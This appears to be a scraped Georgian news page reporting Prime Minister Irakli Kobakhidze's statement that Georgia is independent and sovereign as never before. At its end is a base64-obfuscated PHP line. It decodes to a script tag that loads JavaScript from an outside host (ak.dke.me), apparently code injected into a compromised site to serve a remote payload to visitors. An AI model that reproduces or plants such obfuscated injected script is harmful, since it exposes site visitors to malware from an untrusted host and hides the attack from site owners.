tube
ავერსი საქკაბელი

თამამად შეიძლება ითქვას, რომ საქართველო დღეს არის დამოუკიდებელი და სუვერენული, როგორც არასდროს,- ამის შესახებ პრემიერ-მინისტრმა, ირაკლი კობახიძემ მთავრობის სხდომაზე განაცხადა.

როგორც კობახიძემ აღნიშნა, ეს არის ის მდგომარეობა, რასაც უნდა გავუფრთხილდეთ.

„საქართველომ დღემდე შეძლო დამოუკიდებლობის არამხოლოდ შენარჩუნება, არამედ კიდევ უფრო მეტად განმტკიცება. დამოუკიდებლობა არის ის, რასაც განსაკუთრებულად უნდა გავუფრთხილდეთ მომავალშიც. დამოუკიდებლობას სჭირდება მუდმივი გაფრთხილება, თამამად შეიძლება ითქვას, რომ საქართველო დღეს არის დამოუკიდებელი და სუვერენული, როგორც არასდროს. ეს არის ის მდგომარეობა, რასაც უნდა გავუფრთხილდეთ. დღევანდელ დღეს განსაკუთრებულად უნდა გავიხსენოთ ის ადამიანები, რომელთაც ამ წლების განმავლობაში დამოუკიდებლობის იდეას შესწირეს ყველაზე ძვირფასი - სიცოცხლე. განსაკუთრებით უნდა მივაგოთ პატივი ჩვენს ჯარისკაცებს, რომლებიც შეეწირნენ ომებს საქართველოს დამოუკიდებლობისთვის“, - განაცხადა კობახიძემ.

100
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");